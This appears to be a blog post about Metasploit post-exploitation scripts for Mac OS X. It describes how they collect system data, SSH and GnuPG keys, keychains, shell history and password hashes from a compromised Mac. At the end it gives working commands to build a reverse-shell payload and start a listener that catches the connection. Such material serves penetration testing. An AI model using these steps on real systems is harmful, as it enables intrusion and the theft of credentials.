Metasploit Mac OS X Post Exploitation : Enumeration and Hash Dump

As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Mac OS X target.

These Metasploit post exploitation scripts are supporting version 10.3, 10.4, 10.510.6 and 10.7 of Mac OS X. For the moment are only working with a “shell” payload but Carlos is working on a version how is supporting a complete integration with meterpreter. Also Carlos is working on an iOS integration.

Mac OS X enum_osx post exploitation script

This script will permit you to gather available data types by automating the execution of the “/usr/sbin/system_profiler” command. Depending on your Mac OS X version, you will have more or less available data types. Here under some examples :

  • SPSoftwareDataType : Everything related to system software (system version, kernel version, boot volume, boot mode, computer name, user name, time since boot and if secure virtual memory is enabled).
  • SPNetworkDataType : Every thing related to the networks configurations (IPs, networks, gateways, configuration methods, proxies, Mac addresses, etc.).
  • SPBluetoothDataType : All informations related to the Bluetooth configuration (shared folders, authentication requirements, etc).
  • SPEthernetDataType : All informations related to ethernet cards (bus, vendor and device ID, vendor and device subsystem ID, revision ID, BSD name, Kext name, location and version).
  • SPAirPortDataType : All informations related to the Airport configuration (model, firmware version, current wireless network and channel).
  • SPNetworkLocationDataType : More detailed information’s on the networks configurations.
  • SPUSBDataType : All informations on the USB bus and connected devices.
  • SPPrintersDataType : All informations on local or remote configured printers.
  • SPFirewallDataType : All informations related to the local Firewall (Firewall mode, authorized applications, logging mode and stealth mode).
  • SPApplicationsDataType : All informations on all installed software’s (version, last modification date, location, etc.).
  • SPDeveloperToolsDataType : All informations on the installed development tools.
  • SPFrameworksDataType : All informations on the Apple Frameworks (version, last modification date, location, etc.).
  • SPStartupItemDataType : All informations on the start-up items (description, location, requirements, start-up order preferences).
  • SPPrefPaneDataType : All informations related to the preference panes (version, visible or not, identifier and location).
  • SPLogsDataType : All non rotated log files and they’re recent contents.

Also some others commands are executed to gather more information’s :

  • Current TCP connections (netstat -np tcp).
  • Current UDP connections (netstat -np udp).
  • Environment variables (printenv).
  • Last boot time (who -b).
  • Current activity (who).
  • Process list (ps -ea).
  • List of all users (dscacheutil -q user).
  • List of all groups (dscacheutil -q group).
  • Download the “$HOME/.ssh/” folder contain.
  • Download the “$HOME/.gnupg/” folder contain.
  • Download the “$HOME/*_history” file.
  • Download users configured Keychains by “/usr/bin/security list-keychains” command.
  • Extract and download history files.
  • Take a screenshot of the current session in JPEG format.

Same as for the hasdump script, if the Metasploit session is running with the Mac OS X root privileges, the SHA, LM and/or NTLM users accounts passwords hash dumps will be download.

All gathered informations are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.

Metasploit enum_osx post exploitation
Metasploit enum_osx post exploitation

Mac OS X hashdump post exploitation script

As described above this script will focus only to gather the Mac OS X users accounts SHA, LM and/or NTLM passwords hash dumps, and download everything on the Metasploit station. All gathered information’s are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.

Metasploit OS X hashdump post exploitation
Metasploit OS X hashdump post exploitation

To test these scripts you only need to create an executable payload for Mac OS X and follow these steps.

First create the payload with msfpayload and upload it to the targeted Mac OS X.

sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test

Then in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j

After on the targeted Mac OS X, execute the test payload

Or you could play with a valid Mac OS X system or application exploit. Here under a PoC video.